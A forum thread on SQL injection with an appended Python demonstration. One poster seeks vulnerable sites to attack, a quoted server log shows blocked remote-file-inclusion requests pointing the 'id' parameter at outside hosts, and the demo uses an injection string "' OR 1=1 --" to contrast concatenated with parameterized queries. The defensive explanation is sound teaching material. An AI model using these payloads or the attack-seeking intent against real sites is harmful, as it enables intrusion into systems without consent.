SQL Injection

Anybody here know how to do SQL injection? I know how to do it, it's just hard to find a good vulnerable site.
I am banned for trying to hack this website.
Why would you want to inject someone else's website? It's illegal, and ignorant if you ask me.
Not necessarily illegal. It is used in many legal ways.
No. SQL injection is gaining access to someone's database without their permission. Vulnerabilities are something that isn't supposed to be there, which means you are exploiting their website without their consent. How is that not illegal?
It's illegal if you do something with it. Like deleting a table or the whole database or creating a table. Know what I mean?
No, it's illegal to gain access to something that isn't yours in general.

Look at it this way. The lock on your door isn't that great, and someone enters your house. They might touch some things, but they don't break them. Do you consider that legal?
Whatever, I give up lol.
My site (not my current site, the test site that I made) got hacked secretly; the hacker didn't attempt to change my password or anything. It was kinda strange that he found an exploit. I bet he did that to other sites.

All he did was create a thread and set it to hidden, and it said "blahblahblahblahblahblah".
Care to explain how this was accomplished? I'm hoping this CMS I'm making for my class I'm taking isn't vulnerable.
I checked the log today, very weird over here:
-----------------------------
* 2008-12-21 15:14 **.**.**.*** Security A variable type check failed, expecting 1/INT for 'id' : 81//page.php?id=http://inamsan.kg.kr/emt/id.txt??? - /page.php?id=81//page.php?id=http://inamsan.kg.kr/emt/id.txt???

* 2008-12-21 15:14 **.**.**.*** Security A variable type check failed, expecting 1/INT for 'id' : http://inamsan.kg.kr/emt/id.txt??? - //page.php?id=http://inamsan.kg.kr/emt/id.txt???

* 2008-12-21 15:05 ***.***.***.*** Security A variable type check failed, expecting 1/INT for 'id' : 81" class="searchlinktitle" title="www.igfxdesigns.co.uk/page.php?id=81" onMouseOver="window.status='www.igfxdesigns.co.uk//page.php?id=http://www.acewaste.com.au/content/robo.txt??? - /page.php?id=

* 2008-12-21 15:05 ***.***.***.*** Security A variable type check failed, expecting 1/INT for 'id' : http://www.acewaste.com.au/content/robo.txt??? - //page.php?id=http://www.acewaste.com.au/content/robo.txt???
-----------------------------
Seems like he tried to get userid1's password.
Those are standard hack attempts. I get them all the time. I think everyone does. Good thing they're blocked by Seditio, eh?
SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.

The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.

The injection process works by prematurely terminating a text string and appending a new command. Because the inserted command may have additional strings appended to it before it is executed, the malefactor terminates the injected string with a comment mark "--". Subsequent text is ignored at execution time.


Thanks

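The string-termination mechanism described in the last post, and the integer type check seen in the log excerpt earlier in the thread, shown as an added example that is not part of the thread or of any CMS mentioned in it. It uses SQLite through Python's `sqlite3` as a stand-in for the database; the `pages` table, its rows, the function names and the sample inputs are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for a CMS "pages" table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, hidden INTEGER)")
    db.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                   [(81, "About", 0), (82, "Draft notes", 1)])
    return db

def find_concatenated(db, title):
    # Vulnerable: the input becomes part of the SQL text itself, so a quote
    # in it ends the string literal and "--" comments out the rest.
    sql = "SELECT id FROM pages WHERE title = '" + title + "' AND hidden = 0"
    return [row[0] for row in db.execute(sql)]

def find_parameterized(db, title):
    # Hardened: the input is bound as a value and is never parsed as SQL.
    sql = "SELECT id FROM pages WHERE title = ? AND hidden = 0"
    return [row[0] for row in db.execute(sql, (title,))]

def parse_id(raw):
    # Type check in the spirit of the "expecting 1/INT for 'id'" log lines:
    # accept only a short run of ASCII digits and reject everything else.
    if not (raw.isascii() and raw.isdigit()) or len(raw) > 9:
        raise ValueError("id must be an integer")
    return int(raw)

def page_by_id(db, raw_id):
    # Validate first, then still bind the value as a parameter.
    row = db.execute("SELECT title FROM pages WHERE id = ? AND hidden = 0",
                     (parse_id(raw_id),)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    crafted = "About' OR 1=1 --"  # constructed input: closes the string early
    print(find_concatenated(db, crafted))   # the hidden row is returned too
    print(find_parameterized(db, crafted))  # treated as a literal title: no match
    print(page_by_id(db, "81"))
```
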